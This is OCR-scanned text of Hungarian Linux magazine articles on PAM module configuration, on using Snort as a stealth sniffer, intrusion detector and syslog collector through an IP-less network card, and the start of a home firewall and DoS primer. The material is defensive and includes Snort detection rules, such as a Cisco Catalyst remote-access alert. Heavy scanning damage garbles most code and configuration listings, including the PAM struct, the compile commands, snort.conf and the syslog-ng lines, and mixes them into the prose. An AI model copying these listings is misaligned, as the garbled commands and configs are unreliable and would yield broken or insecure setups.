Statikusan betöltött modulok kezelése 

Előfordulhat, hogy egy modul a Llibpam-be statikusan van 
lefordítva (statically linked). Ez tulaadonképpen valamennyi 
modulra igaz, amelyek az alap PAM-terjesztésbe tartoznak. 
Hogy statikusan be lehessen fordítani, a modulnak a függ- 
vényeit leíró adatot úgy kell közzétennie, hogy az ne 
ütközhessen más modulokkal. 

A statikus modulokhoz szükséges további kódot érdemes 
tifdef PAM STATIC és tiendif részek közé zárni. 

A statikus kód egyetlen szerkezetet tartalmaz: a struct 

pam module-t. Ezt pam modname modstruct-nak nevezik, 
ahol a modname a fájlrendszeren használt modulnév, a 
bevezető könyvtárnév (általában /usr/lib/security/) és az utótag 
(általában .so) elhagyásával. 





Hifdef PAM STATIC 

struct pam module pam unix auth modstruct - ( 
"óam nix atm , 
pam sm authenticate, 
pam sm sétered,; 


NULL, 
NULL, 
NULL, 
NULL, 
Htendif 


Modulunk immár statikus vagy dinamikus elemként is 
lefordítható. Fordítsuk le a következő parancsokkal: 


ge PIC -e pám moduülés-námeé c 
lid -x shared -o 

Spam module-name.so 

Spam module-name.o 


Az alkalmazás biztonságossá tétele: a PAM-heállítófájl 

A Linux-PAM által vezérelt rendszerbiztonság szempontjá- 
ból érdekes helyi beállításfájlok a két lehetséges hely közül 

az egyiken helyezkednek el: egyetlen rendszerfájlban 
(/etc/pam.conf) vagy a /etc/pam.d/ könyvtárban. 

A fetc/pam.conf fájl általános formátumának szerkezete szolgál- 
tatásnév-modultípus-vezérlőzászló (flag) modulútvonal alakú. 
Megtehetjük azt is, hogy az alkalmazáshoz tartozó PAM-beál- 
lításokat a /etc/pam.d könyvtár külön könyvtárába helyezzük. 
Ebben az esetben a formátum: module-t pus-vezérlőzászló 
modulútvonal alakot vesz fel. A szolgáltatásnév a fájl nevévé 
válik. A szolgáltatás neve gyakran az adott alkalmazás hagyo- 
mányos neve, például azServer. 


Modultípus 

Négy modultípus létezik: azonosító (auth), számla (account), 

folyamat (session) és a jelszó (password). 

e  auth: meghatározza, hogy a felhasználó valóban az-e, 
akinek vallja magát. Ezt általában jelszóval végezzük, de 
alkalmazható ennél kifinomultabb módszer is, például 
a biológiai jellegzetességek vizsgálata. 

e account: meghatározza, hogy a felhasználó jogosult-e 
használni a szolgáltatást, lejárt-e a jelszava és így tovább. 

e password: lehetőséget nyújt a felhasználónak, hogy azono- 
sítójelét megváltoztassa. Általában itt is a jelszóról van szó. 

e session: azok a dolgok, amelyeket a felhasználó azono- 
sítása előtt, és után meg kell tenni. Ide tartozik a felhasz- 
náló saját könyvtárának befűzése és leválasztása, a be- 
és kilépés naplózása, továbbá a felhasználó által elérhető 
szolgáltatások korlátozása, illetve e korlátozások feloldása. 
lovábbá négy vezérlőzászló is létezik: reguired 
(megkövetelt), reguisite (előfeltétel), sufficient 
(elégséges) és optiona1 (tetszőleges, elhagyható). 

e reguired: azt jelzi, hogy a modul sikere elengedhetetlen 
a modultípus-beállítás sikeréhez. A modul sikertelenségét 
a felhasználó addig nem veheti észre, amíg az összes hátra- 
lévő (azonos modultípusú) modul végre nem hajtódott. 

e  reguisite: azonos a reguired-del, azzal a különbséggel, 
hogy a modul sikertelensége esetén az eredményt közvet- 
lenül az alkalmazásnak adja vissza. 

e sufficient: ha a modul sikerrel járt valamint az összes 
korábbi modul szintén sikeres volt, további modulokat 
már nem kell meghívni. 
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e "optional: jelzi, hogy a modul sikere nem feltétlenül 
szükséges a felhasználónak az alkalmazáshoz történő 
hozzáféréséhez. Ertékét csak akkor kell figyelembe venni, 


ha az előző modulok sorában semmilyen más egyértelmű 
siker vagy hiba nem fordult elő. 


A dinamikusan betöltött objektumfájlok (azaz maga a betölt- 
út első karaktere /, az teljes elérési utat feltételez. Ha nem ez a 
helyzet, a modulútvonal az alapértelmezett útvonallal egészül 
ki, amely a /usr/lib/security. 

A modul meghívásakor átadott értékek, jelek listája nagyon ha- 
sonló ahhoz, ahogy a Linux-héjprogram dolgozza fel a paran- 
csokat. Általában a helyes értékek elhagyhatók és modulfüggők. 
Végül a beállításfájl megírásához át kell szerkesztenünk a 
l/etc/pam.conf fájlt és be kell illesztenünk a következő kódot: 


check user auth reguired 
/lib/security/pam unix.so 


Ez azt fogja jelenteni, hogy a szolgáltatásnevekhez a 

check user és auth modultípus elengedhetetlenül szükséges 
(reguired). A hitelesítéstípus elvégzéséhez betöltendő modul 
a pam unix.so, amely a /lib/security/ könyvtárban található. 


Összegzés 

A Linux-PAM használatával többé már nem vagyunk egyetlen 
azonosítási sémához sem kötve, terveinknek kizárólag saját 
képzeletünk szabhat határt. 


A listák megtalálhatóak a 41. CD Magazin/ PAM könyvtárában. 
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Rejtett szaglászás-, betörésérzékelés és naplózás 


A támadók képtelenek átírni a naplóállományokat, 
ha kapcsolódni sem tudnak a naplózó géphez. 
Ismerkedjünk meg a rejtőzködés módozataival! 





Linuxvilág 2001. decemberi számában, a syslog 
AA rendszernapló beállításáról szóló írásomban már meg- 

említettem a lopakodó naplózást, vagyis az IP-címmel 
nem rendelkező központi naplózó kiszolgálógépet, amelyet 
remekül el lehet rejteni a betolakodók szeme elől. 
Ráadásul a naplózókiszolgálók csoportja nem is az egyetlen, 
amelyik előnyt képes kovácsolni egy kis rejtőzködésből. A be- 
törésérzékelő rendszerek (Network Intrusion Detection System 
- NID5$) szondái és a szaglászók IP-cím nélkül is tökéletesen 
működnek, úgyhogy az általuk védett hálózatnál is kevésbé 
sérülékenyek. E havi írásomban egyetlen IP-cím nélküli háló- 
zati kártyán fogom a sokrétű és nagy teljesítményű Snort 
háromféle használatát bemutatni: rejtett szaglászóprogram- 
ként, rejtett NIDS-szondaként és rejtett naplózóként. 
Amennyiben már jól ismered a Snortot, remélem, most megta- 
pasztalod, milyen könnyű is rejtett üzemmódban használni. 
Ha pedig most készülsz vele megismerkedni, ez a cikk életmen- 
tő tanfolyam lesz a számodra. A cikkben szereplő valamennyi 
parancs és beállítás mind az ÍP-címmel rendelkező, mind az 
IP-cím nélküli hálózati kártyákon egyformán jól működik. 


Vajon mire is jó a rejtőzködés? 

Az Internethez kapcsolódó számítógépek működtetése kocká- 
zatos. Minden esetben, amikor valamilyen szolgáltatást kíná- 
lunk, fennáll a lehetősége, hogy egy rosszindulatú felhasználó 
valamelyik alkalmazás biztonsági résén keresztül kibillenti a 
rendszert rendes működéséből, vagy egyszerűen olyan meny- 
nyiségű szolgáltatás-megtagadással (Denial-of-Service) járó 
támadással halmozza el, hogy azt már nem lesz többé képes 
elviselni. A web- és FIP-kiszolgálók, valamint a más végfelhasz- 
nálói közreműködést feltételező kiszolgálók esetében ezek a 
kockázati tényezők sohasem küszöbölhetők ki, csupán a lehető 
legkisebb mértékűre csökkenthetők vagy feltartóztathatók. 

A hálózati szondák és naplózók azonban abból a szempontból 
egyediek, hogy természetükből fakadóan befogadó szerepet 
játszanak: adatokat csak fogadnak, viszont a maguk részéről 
semmit sem kell küldeniük. Ezért ha befogadó jellegükből 
előnyt kovácsolunk, az általuk védett hálózatból elérhetetlenné 
válnak, s ez jó ötletnek bizonyulhat. 

Eredményül egy olyan rendszert kapunk, amelyet csak konzol- 
ról lehet irányítani, vagy külön hálózati kártyát kell beleépíteni, 
amely IP-címmel rendelkezik. Abban az esetben, ha a rend- 
szerbe két hálózati kártya van építve, két fontos tanácsot 
érdemes megfogadni: először is az IP-továbbítást ki kell kap- 
csolni. A második, hogy az ÍP-címmel ellátott kártyát a szag- 
lászó-naplózó hálózattól eltérő hálózatra kell kapcsolni. A pél- 
dánál maradva ez egy külön hálózat lehet az NIDS-szondák, 
rendszerfelügyeleti és naplózó munkaállomások részére. 


Fizikai és rendszerszintű felépítés 
A hálózati kártya (Network Interface Card — NIC) telepítése 
egyszerű feladat. Feltéve, hogy a hálózati kártyát a rendszerma- 
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god támogatja, a Linux önműködően felismeri azt, a kezeléséhez 
csupán be kell tölteni a megfelelő modul(oka)t. 

Mindamellett az egyes Linux-változatok nagyon is eltérő 
módon végzik el a hálózati kártyák kezdeti jellemzőinek beál- 
lítását. Red Hat-változatra épülő rendszeremben a második 
kártya telepítéséhez létre kellett hoznom egy új állományt, 

a /etc/sysconfig/network-scripts/ifcfg-eth1-et, az alábbi 
tartalommal: 


DEVICE-eth1 
USERCTL-no 
ONBOOT-yes 
BOOTPROTO- 
BROADCAST - 
NETWORK- 
NETMASK- 
IPADDR- 


Annak ellenére, hogy a Red Hat Kudzu eszköze az új csatoló- 
kártyát önműködően érzékelte, a hálózati beállító héjprogramja 
hibajelzéssel ért véget, amikor az IP-címet nem adtam meg. 
Saját /etc/sysconfig/network-scripts/ifcfg-eth1 állományom 
létrehozását követően a Red Hattel sikerült úgy működésbe 
hoznom a kártyát, hogy nem kellett neki IP-címet adnom. 
Lehetséges, hogy a különböző, a Red Hattőól eltérő Linux- 
változatokban ugyanezt az eredményt más és más módon 


lehet elérni. 


Rejtett szaglászás 

Ha már telepítetted és üzembe helyezted rejtett hálózati kár- 
tyádat, és a megfigyelni kívánt hálózathoz is csatlakoztattad, 
eljött a rejtett szaglászás kipróbálásának az ideje. A cikk 
hátralevő részében feltételezni fogom, hogy gépedre már 
telepítve van a Snort program. A legtöbb Linux-változat saját 
Snort-csomaggal rendelkezik, a legfrissebbet pedig a 

2 http:/wwwi.snort.org (a 41. CD Magazin/Snort könyvtárában 
is megtalálható) címről szerezheted be. Ha Snortot NIDS-ként 
kívánod használni, különösen fontos a Snort legfrissebb válto- 
zatának beszerzése. 

A szaglászó üzemmódú Snort használatához nem kell mást 
tenni, csak kiadni az alábbi parancsot: 


snort -dvi ethi 


A -d kapcsoló a Snortot az alkalmazás adatainak visszafejtésére 
utasítja, a -v pedig arra, hogy a csomagok tartalmát írja ki a 
konzolra, a -i után adhatjuk meg a megfigyelni kívánt kártyán. 
A -C kapcsolóval a programot a hexadecimális adatok 
átlépésére lehet utasítani, így csak az ASCII-karaktereket fogja 
megjeleníteni (1. lista, lásd 41. CD Magazin/Snort könyvtár). 

A Snort a szaglászást az IP-címmel nem rendelkező hálózati 
kártyán is hibátlanul végzi. 





ATOT 


Rejtett betörésérzékelés 


CG 
A betörésérzékelés önmagában is hatalmas terület, a Snort be- 2. lista A snort.conf minta beállítóállomány E 
törésérzékelő képességei pedig sokfélék és erőteljesek. Mielőtt 6 
alaposabban elmélyednénk a témában, úgy érzem, fel kell Ht 0. I145OEik Set globcöbBESnEE s 
hívnom a figyelmet, hogy ennek a témának épp csak felszínét 2 
érintettem: a Snort alapértelmezéshez közeli beállításokkal való Coneeeogdir: / vátyalocasm6me I) 
működtetése távolról sem a leghatékonyabb módja a Snort 2, 
NIDS-ként való használatának. 9 1. lgdpős: détWWzEV INN emzte e 
A Snort NIDS üzemmódban való indításához mindössze a H testreszabkEsa: ses 
letc/snort/ snort.conf állomány szerkesztését kell elvégeznünk, var HOME NET 192.168ő6888056E ss 
és a Snortot démonmódban elindítanunk. Ezután már csak a var EXTERNAL NET any 2 
snort.conf-ban meghatározott szabályokat kell időnként fírissí- var  SMTE SHOME NET 5 as 
teni, amint újabb támadási aláírások válnak hozzáférhetővé. vat  HTTB SERMERS "SHOMBENEE sZ 
Tekintsük át az egyes lépéseket! var SOL SERVERS S$SHOME NET ve. 
Annak ellenére, hogy a -c lehetőség révén tetszőleges vat DNSÉSERVERS FESZ SÉ68STS250752 b 
beállítóállomány kijelölhető, a legtöbb ember mégis a var RÜLE PATH ./ 4 
letc/snort/snort.conf állomány használata mellett szokott sz 
dönteni. E cikk hátralevő részében azzal a feltételezéssel élek, H 2. IgpOs: az eliford t k beXl1 tX£sa o 
hogy választásod szintén erre a lehetőségre esett. A 2. lista 
csonka, de jelentésében teljes Snort-beállítóállományt mutatbe. preprocessor frag2 
Mint az világosan látható, a Snort-beállításban találhatók meg preprocessor stream4: detect scans 
a teljes körű lehetőségek, a változómegadások, az , előfordítói" preprocessor stream4 reassemble 
és kimenetszabályozó utasítások (direktívák) és a Snort-szabá- preprocessor portscan: S$HOME NET 4 3 
lyok. A teljes körű lehetőségek (vagyis config-utasítások) a Soortscan: leg 
legtöbb lehetőség beállításához kellemesen használható köz- 
vetlen kapcsolók, amelyek a Snortnak indítózászlókként t 3. lopos: a kimenetet kezeli begp li 
adhatók át, és gépelést takarítanak meg. t modulok bezll tEsa 
A Snort-szabályok által használt változók a betörésérzékelést output database: log, mysagl, user-root 
pontosabbá teszik. Ha példáula DNS SERVERS változóban doname-snort host-localhost 
megadjuk névkiszolgálóink IP-címét, akkor a Snort figyelmen 
kívül fog hagyni bizonyos, a DNS-kiszolgálónk által küldött t 4. lopos: a szabglyköszletek testreszabása 
csomagokat, amelyek egyébként támadási kísérleteknek 
tűnhettek volna. alert tcp 5SHOME NEL 7161 " - SEXTERNAKt NE any 
Az előfordítói utasítások az előfordítói modulok beállítására (msg: "Vegyes  zemíis Cisco Catalysthez tEvoli 
használhatók, amelyek tulajdonképpen olyan csomagmódosító Snozzktorós!; 
Snort-elemek, amelyek a csomagokat még a szabályokkal való flags:SA; reference:arachnids, 129; 
ütköztetés előtt módosítják. reference : cve , CVE-1999-0430; 
A frag2 előfordítói zászló például újra összeállítja a feldara- classtype :bad-unknown; sid:513; rev:1;) 
bolt csomagokat, de egyúttal figyel az IP-cím töredékalapú 
és töredékjelleghez kapcsolódó rendellenességekre is. H A sz vegEllomEnyok előrösi etvonala, 
A kimenő utasítások olyan feldolgozás utáni beállítómodulok, H amelyekben tovAbbi kiegGsz ti szabAlyok 
amelyek a Snort-riasztások vagy más módon megfigyelt H adhat k meg: 
csomagok naplózását és tárolását teszik lehetővé. Későbbi 
összehasonlítás és elemzés végett a csomagokat MySOL- include $RULE PATIH/bad-traffic.rules 
adatbázisba lehet rögzíteni és a későbbiek folyamán olyan include $RULE PATIH/exploit.rules 
utólagos adatbázis-feldolgozó eszközzel tanulmányozni, include $RULE PAIH/scan.rules 
mint a 3 http:/www.andrew.cmu.edu/snortacid.html címről include $RULE PAIH/finger.rules 
letölthető ACID-program. include $RULE PATH/fÍtp.rules 
Végül maguk a szabályok közvetlenül kilistázhatók, mint az 
a 2. listán bemutatott Vegyes üzemű Cisco Catalysthez távoli HG EDE SZE] 


hozzáférés" riasztásnál történt; vagy szövegállományba fűz- 

hetők, mint az a 2. lista hátralevő részében látható. Az utóbbi 

módszerrel könnyedén lehet használni a szabályokat tatalmazó 

állományt, amelyet a eth1 csatolókártyát állítottuk be. 

2 http:/www.snort.org/d[/signatures/snortrules. tar.gz (41. CD Az alapértelmezésnek megfelelően a Snort a riasztásokat 
Magazin/Snort könyvtár) címen a Snort fejlesztőcsapat félórán- a /var/log/snort/alert naplóállományba rögzíti, míg a kapu- 


ként frissít. A Snort NIDS üzemmódú, a beállítóállományt pásztázó tevékenységet a /var/log/snort/portscan.log állo- 
felhasználó indításához a következő parancsot használjuk: mányba. Ahogyan a 3. listán látható, az egyes riasztásokban 
megjelölt csomagok naplózása a /var/log/snort könyvtár 
snort -c /etc/snort/snort.conf -D -i ethi alkönyvtáraiban fog megtörténni. 
A kijelölt NIDS-szondának már a rendszerbetöltés során el 
Nem szabad elfelednünk, hogy korábban bemutatott kell indítania a Snortot. A Snort hivatalos RPM-csomagja 
példáinkban rendszerünk rejtett fogadófelületének az telepíti a /etc/init.d/snortd indító héjprogramot. Amint elvé- 
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gezted a Snort igényeid szerinti beállítását, ezt a héjprogramot 
a chkconfig paranccsal tedd futtathatóvá a kívánt futási 
szinteken. Ha a Snortot forrásprogramból telepítetted, szükség 
lehet egy saját indító héjprogram készítésére. 

A Snort NIDS üzemmódú működtetése maga is megérde- 
melne egy cikket, még inkább cikksorozatot, de az eddig 
elmondottak elegendőek ahhoz, hogy bemutassuk: a Snortot 
tényleg lehet IP-cím nélküli hálózati kártyával használni, 
továbbá azt is felvázolhassuk, hogyan kell munkára bírni 

a NIDS üzemmódú programot. 


A rejtett üzemmódú naplózás 

Elérkezett az ideje, hogy a korábban említett két módszert egy 
harmadikká egyesítsük, vagyis rejtett üzemmódú naplózásssá. 
A szokásoknak megfelelően a központi naplózó kiszolgálógép 
a sys109-ot vagy vagy a sys1o0g-ngt-t futtatja. És nem csalás, 
nem ámítás: a naplócsomagok a Snort programmal IP-címmel 
nem rendelkező hálózati kártyán keresztüli befogása valóban 
lehetséges, ezt aztán tovább lehet adni a syslognak vagy a 
syslog-ngnek. De ha már egyszer adott a lehetőség, miért is ne 
lehetne a Snort számára egyszerűen lehetővé tenni, hogy a 
naplóállományt közvetlenül maga rögzítse? 

Az általam most bemutatásra kerülő módszer a Snort, a tai1 
és az awk eszközt használja a központi gépen működtetett 
naplózóalkalmazás helyett, ami azt jelenti, hogy a naplóbejegy- 
zéseket küldő gépeken a syslog vagy a sys10g-ng beállkí- 
tásait az alábbiakban ismeretett leírásnak megfelelően a továb- 
biakban is el kell végeznünk. 

legyük fel, hogy egy hálózati szakaszra felfűzött kiszolgáló- 
gépek naplóállományait egyetlen naplózó kiszolgálógépen 
szeretnénk gyűjteni. Tételezzük fel ezen kívül azt is, hogy most 
a naplóállományok titkosságát kevésbé tartjuk fontosnak, mint 
az épségüket. Senkinek semmiféle hallgatózó szöszmötölésével 
nem törődünk, viszont nem szeretnénk, ha bárki is matatna 

a központi gép által egyszer már elfogadott naplóbejegyzések 
között. A fenti kívánalmakat figyelembe véve tehát a naplózó- 
kiszolgálót a helyi hálózatra IP-cím nélküli hálózati kártyával 
csatlakoztatjuk, és a helyi hálózat hamis IP-címére küldött 
naplócsomagokat górcső alá vesszük. 


A kiszolgálók beállítása a rejtett naplózó használatára 
Minden kiszolgálón, ahonnan a naplózógépnek naplócsoma- 
gokat szeretnénk küldeni, két teendőt el kell végeznünk. 

Az egyik, hogy minden egyes küldő rendszert beállítsunk, 
hogy az üzeneteit milyen ál IP-címre küldje. Az ál, illetve hamis 
alatt azt értem, hogy ezt az IP-címet semelyik gépnek nem 
szabad kiosztani, de az adott hálózatban ténylegesen érvényes 
címnek kell lennie. Tételezzük még fel azt is, hogy helyi háló- 
zatunk címe 192.168.1.0/24-es, és a naplózáshoz használt 

, hamis" cím 192.168.1.111. Minden hálózatra kötött, szab- 
ványos syslogot használó kiszolgáló /etc/syslog.conf beállító- 
állományába be kell szúrnunk a 

4 ÍTÓ 9192.168.1.111 

bejegyzést. 

Ezzel szemben azokon a gépeken, amelyeken a sys1o0g-ng 
naplózást használjuk, a következő néhány sort 

kell beillesztenünk a /etc/syslog-ng/syslog-ng.conf állományba: 


destination d löghóst 1 üdp(lipo(192.168.1.111) 
eeporti5i4jis hi 
filter f info (í( level(info); b); 
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3. lista A rejtett naplózáshoz szükséges 
/etc/snort/snort.conf beállítófájl 


iZatSELSTÉRNAL NET ad 


ECAEBEL dump payload 
CSrrETertelüb chars omki 

config Végdir: /var,MöSFEnere 
preprocessor Írag2 

itbg udp 192.168. 1ÉFEFE EGET e 
SZESZES Oz ÁST zza s Et 

(logto: "1logged-packets!" ; ) 


log ( filter(f info); destination(d loghost); ); 


Mindkét esetben szükség lehet — mint az a fenti két példából 
kitűnt — a túlságosan általános , info" vagy , magasabb" 

(, higher") fontossági jellemzők helyett egyéni csomagszűrő 
szempontok megadására. 

Az egyes gépeken futó naplózó alkalmazások beállítóállomá- 
nyaiba a megfelelő sorok beillesztésén kívül minden naplóbe- 
jegyzést küldő gépnek szüksége lesz a hamis IP-címre vonat- 
kozó ARP-bejegyzésre, hogy a gép képes legyen elvégezni 

a címfeloldást. Amennyiben helyi hálózatodban elosztó 
működik, már maga az ARP-cím is lehet nem létező, de való- 
sághű IP-cím. 

Ha azonban a hálózatodban kapcsoló üzemel, ehelyett a 
naplózó kiszolgálógép hálózati kártyájának MAC-címét, azaz 
fizikai címét kell megadnod. 

A naplóbejegyzéseket küldő gépen vagy -gépeken statikus, 
azaz állandó ARP-bejegyzés az alábbi paranccsal hozható létre: 
arp -s 192.168.1.111 00:04:C2:56:54:58 
ahola192.168.1.111 a naplózókiszolgálónk ál-IP-címe, 

a 00: 04 :C2:56:54 : 58 számsorozat pedig ugyanezen gép 
hálózati kártyájának valódi vagy hamis-MAC-címe. 

Mostanra a kapcsolóval szerelt helyi hálózatunk valameny- 
nyi küldő gépnek beállításával végeztünk, úgyhogy a napló- 
bejegyzéseket mindegyikük a 192.168.1.111-es címre 
küldi; az elosztóval szerelt hálózat esetén pedig azok a be- 
jegyzések a rejtett naplózókiszolgáló alhálózatára lesznek 
irányítva. Nem marad más feladatunk, mint magának a rejtett 
naplókiszolgálónak a beállítása. 


A Snort beállítása a rejtett naplózókiszolgálón 

A betörésérzékelési üzemmódnál bemutatottakhoz hasonlóan 
a Snortot rejtett naplózóként ebben az esetben is mindössze 
egyetlen állománnyal, a /etc/snort/snort.conf szerkesztésével 
állíthatjuk be. A 3. listán a Red Hat változatra épülő rejtett 
naplózógép snort.conf állományába nyerhetünk betekintést. 
Lássuk, hogyan is épül fel! 

Először is egy változónak történő értékadást látunk: 
EXTERNAL NET any. A Snort NIDS-üzemmódú működésé- 
hez semelyik másik változó itteni használatára nincs szükség. 
lekintsünk át néhány beállítóutasítást: 

a dump payloada -d parancssori kapcsolónak felel meg, 

a dump chars pedig a -C kapcsolónak, míg a logdir parancs 
a Snort naplóállományai számára a saját könyvtárat jelöli ki, 





utóbbival egyenértékű a -1 (nem egyes, hanem kis I betű!) 
lehetőség használata. 

A 3. listán végighaladva felfedezhetünk egy előfordítói utasí- 
tást: a frag2 előfordítói utasítást az előre beállított értékekkel 
hívjuk meg. Lehetséges, hogy a nagyobb méretű naplóállo- 
mányok feldarabolásra kerülnek, de mégha ilyen állapotban 
vannak is, ez a lehetőség újraegyesíti őket számunkra. 

Végül itt következik munkánk értelme: a felhasználói igénye- 
ket tükröző Snort-szabály. A Snort-szabályok megalkotása 
semmivel sem bonyolultabb feladat, mint mondjuk IP Tables- 
vagy ÍP Chains-szabályok létrehozása — csupán a TCP/IP- 
protokollok működési elvét és az alkalmazások viselkedésének 
ismeretét tételezi fel. A ,Snort Felhasználói Kézikönyv" 
(elérhető a 3 http:/www.snort.org/docs/writing. rules címen) 
mindezt világosan és mindenre kiterjedően elmagyarázza. 
Haladjunk végig lépésről lépésre a 3. listában bemutatott 
Snort-szabályon: 


log udp 192.168.1.20/32 any -: 
5192.168.1.111/32 514 (logto: "logged-packets!;) 


A szabály a tevékenység naplózását érintő szabállyal kezdő- 
dik. Ebben az esetben a Snortot csomagnaplózóként hasz- 
náljuk. Így a /var/log/snort/alert állomány állandó írogatása 
helyett azt szeretnénk, ha a Snort minden, a szabálynak 
eleget tevő csomagot rögzítene a naplóban, bármiféle riasztás 
küldése nélkül. 

Most következik a szabály ellenőrzőprotokollja, az UDR 

A syslog üzeneteket általában UDP-protokollon keresztül 
küldik. A szabály protokollját a forrásgép IP-címe követi, a 
CIDR-jelölésnek megfelelően. A naplóállományokat küldő 
gép IP-címe 192.168.1.20, és pontosan az e gép küldte 
csomagokat szeretnénk alávetni a szabályoknak. A /32 a 
teljes 32 címbit vizsgálatát előíró CIÍDR-rövidítés, ami azt jelöli, 
hogy ez inkább egy közönséges gépcím, semmint egy cím- 
tartomány. A példahálózatunk gépeiről érkező csomagok 
társításáhoza 192.168.1.0/24 címet jelöltük ki. 

Az IP-címet a forráskapu követi, vagyis ebben az esetben az 
,any" (bármelyik). Az ,any" a Snort-szabályokban gyakori 
megjelölés, mert néhány kivételtől eltekintve a TCP/IP-alkal- 
mazások önkényesen kijelölt, magas azonosítószámmal ellátott 
kapukról küldenek csomagokat. 

A szabály közepén található az irányjelző műveleti jel 
(direction operator) - :, amely azt jelzi, hogy a jel bal olda- 
lán álló IP-cím és kapu a csomag forráshelyéhez tartozik, 
míg a jobb oldalon álló hasonló adatok a célhelyet jelölik. 

A másik irányjelző műveleti jel (a , c 27) azt fejezi ki, hogy 

a forrás és cél IP-címek és a hozzájuk tartozó kapuk kölcsö- 
nösen felcserélhetők. Más szóval ez annyit tesz, hogy a 
Snortnak a csomagokat a megadott szabályoknak alá kell 
vetnie, haladjanak azok bármely IP-cím felé a meghatározott 
kapukon keresztül. 

Az irányjelző műveleti jeltől értelemszerűen jobbra található 
a célhelyet meghatározó IP-cím és kapumegjelölés, a 
192.168.1.111/32 és 514. 

A 192.168.1.111 az a cím, ahová kiszolgálógépeink az 
UDP-protokoll 514-es kapuján keresztül a naplóbejegyzé- 
seiket küldik. 

Végül itt találhatjuk a szabály kiadása során érvényesíthető, 
zárójelek között megadott választható lehetőségeket. Ha több 
ilyen lehetőséget szeretnénk egyidejűleg használni, ;-vel 
(pontosvessző) kell őket elválasztani egymástól. Ezúttal csupán 
egyetlen lehetőség szerepel: logto : "1ogged-packets". 
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A logto: lehetőség révén megadhatunk egy állományt, ahová 
a szabálynak eleget tevő csomagokat lehet rögzíteni — ez a 
/var/log/snort/logged-packets állomány volt. Az állománynév 
elől azért hagyhattuk el az útvonal nevét, mert a logdir 
lehetőséggel a Snort által használandó könyvtárat már koráb- 
ban kijelöltük: /var/log/snort. 

Ha a logto: lehetőséget nem vesszük igénybe, a Snort 

a naplókönyvtárának új alkönytár kezdi el a naplóbejegy- 
zéseket gyűjteni, minden egyes, a szabálynak eleget tevő 
IP-cím számára egy-egy külön alkönyvtárat hozva létre. 

A rejtett üzemmódú naplózás céljainak azonban jobban meg- 
felel, ha a logto: lehetőséggel az egyes szabályoknak eleget 
tevő csomagok naplózására egyetlen állományt jelölünk ki. 

E módszerrel a csomagokat inkább a szabályok szerint ren- 
dezhetjük, semmint az elvégzett műveletek alapján. 

Hűha, ezt hosszabb volt elmagyarázni, mint a rejtett naplózást 
beállító snort.conf fájl hátralevő részét! 

Ám a legfontosabb rész mégiscsak maga a szabály. Ameny- 
nyiben több kiszolgálógép adatait szeretnéd gyűjteni, 

helyes, ha mindegyik naplóbejegyzéseit külön-külön állo- 
mányba gyűjtöd. 


Osszefoglalás 

A Snort a szaglászás-, betörésérzékelés és naplózás sokrétű és 
nagyteljesítményű eszköze. Rejtett üzemmódú szaglászóként 
vagy NIDS-egységként való beállítása könnyű, és rejtett üzem- 
módú naplózómegoldásba történő beépítése is hasonlóképpen 
kivitelezhető. Minden jót a naplózási és NIDS-kísérletekhez, 
legyenek akár rejtettek, akár nem! 


A cikkhez tartozó listák megtalálhatóak a 41. CD Magazin/Snort 
könyvtárában. 
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Túzfalak 


Sorozatunk előző részében röviden áttekintettük, miként tehetjük 
biztonságosabbá a Világhálón való cirkálásunkat. 
Akinek ez nem lenne elég, az segítségül hívhatja a Linux tűzfalszolgáltatásalit. 


, 
u jságunk hasábjain már többször részletesen kiveséztük 


ezt a témakört, ám úgy gondoltuk, hasznos lehet, ha 

összegyűjtjük azokat a dolgokat, amelyek egy otthoni 
rendszer esetén is jól jöhetnek. 
Kezdjük egy kis bevezetéssel a tűzfalak világába! Alapvetően 
két eltérő típusú tűzfalat különböztetünk meg: az úgynevezett 
állapotfüggő csomagszűréseseket és a proxyalapúakat. Az első 
kategóriába tartozóak gyorsak, de csak azzal foglalkoznak, 
hogy a rajtuk átmenő csomagok honnan hová mennek, illetve 
hogy a bennük lévő adatot milyen protokoll segítségével 
továbbították. A proxytűzfalak viszont már sokkal magasabb 
szinten dolgoznak, már a csomagok tartalmába is belelátnak, 
ezért kiválóan alkalmazhatók például vírusok kiszűrésére vagy 
a forgalom részletesebb ellenőrzésére. A proxyk ugyanakkor 
általában ügyféloldali támogatást is megkövetelnek, ami a cso- 
magszűrőkről nem mondható el. A másik lényeges különbség, 
hogy a csomagszűrés általában az operációs rendszer szintjén 
történik (így van ez a Linux esetében is), míg a proxytűzfal egy 
külön alkalmazás képében fut. Hogy mikor melyik tűzfalat 
érdemes használni, az a pillanatnyi feladattól függ, de ahol 
összetettebb védelemre van szükség, ott mindkét módszert 
együttesen alkalmazzák. Nagy örömünkre maga a Linux-rend- 
szermag is tartalmaz egy jól használható csomagszűrő tűzfalat. 
Egy otthoni rendszer esetében mire tudjuk használni a cso- 
magszűrő tűzfalat? Segítségével egyrészt letilthatjuk, hogy 
kívülről bármelyik kapunkat elérjék, így például keresztbe 
tehetünk a különböző trójai programoknak; másrészt kiszűr- 
hetjük az úgynevezett Denial of Service- (a szolgáltatásmeg- 
tagadásos, röviden: DoS) támadásokat. 
Egy DoS-támadás esetében a cél nem egy bizonyos jogosultság 
megszerzése, ,csupán" a rendszer megakadályozása abban, 
hogy elláthassa feladatát. Ezt el lehet érni például azzal, hogy 
jó sok munkát adnak neki (értsd: túlterhelik), vagy valamilyen 
úton-módon lefagyasztják, súlyosabb esetben tönkreteszik. 
Ha tehát rendszerünkkel valami ilyesmi történne, meg kell 
állapítanunk, hogy DoS-támadás áldozatává váltunk. 
Az a tapasztalat, hogy nincs atombiztos rendszer. Valószínűleg 
nincs olyan bikaerős gép vagy olyan hiperszuper tűzfal, ami 
egy jól megszervezett nemzetközi összefogáson alapuló DoS- 
támadásnak ellen tudna állni. Vélhetően ritkán fenyeget min- 
ket, átlagfelhasználókat ilyesmi. Nekünk esetleg néhány kisebb 
lélegzetű támadással kell számolnunk, amelyekkel szemben a 
Linux eléggé talpraesettnek bizonyult, de a csomagszűrő tűzfal 
segítségével fokozhatjuk védelmünket. 
Az első csomagszűrő tűzfal a Linux-rendszermag 1.1-es válto- 
zatában bukkant fel, ami az igazat megvallva egy, a BSD-s 
világból jól ,összelopkodott" rendszer volt. Azóta ezt már 
többször, az alapjaitól kezdve újraírták, a ma forgalomban lévő 
2.4-es rendszermagok erre a célra az úgynevezett NetFiltert 
használják, amely a 2.2-es rendszermag IP Chains módszerét 
hivatott felváltani. 
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A csomagszűrő tűzfalat az IP Tables, 2.2-es rendszermag eseté- 
ben az ipchains parancs segítségével állítgathatjuk. Meg kell 
